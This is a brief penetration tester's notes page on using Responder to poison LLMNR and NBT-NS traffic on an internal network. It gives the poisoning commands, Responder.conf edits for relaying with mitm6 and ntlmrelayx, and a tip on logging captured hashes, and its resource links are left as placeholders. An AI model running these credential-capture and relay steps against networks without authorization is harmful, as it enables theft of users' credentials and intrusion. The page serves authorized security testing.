Secondary Categories: 02-Credential Access, 02-Lateral Movement
Responder
When performing a internal network penetration test I usually start by running Responder
in Analyze Mode
to see if outdated protocols such as LLMNR
and/or NBT-NS
is utilized.
#Analyze Mode
responder -I eth0 -A
#Begin poisoning request
responder -I eth0
This can also be coupled with mitm6 to poison even more request.
Another great method is to utilize responder, mitm6, and ntlmrelayx to capture and relay credentials
If we are able to leverage LLMNR and NBT-NS then we can use other tools to further leverage this, but first we need to edit the Responder.conf
file that is located at /usr/share/responder/Responder.conf
We need to change the SMB and HTTP from On
to Off
# /usr/share/responder/Responder.conf
SQL = On
SMB = Off #
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
- It is optional, but highly recommended to log hashes to a file in addition to the method or tactic used during ntlmrelayx. You can log the hashes to a file use the
-of
flag in ntlmrelyx
Resources:
Title | URL |
---|---|
place | holder |
Also Check Out:
- PLACEHOLDER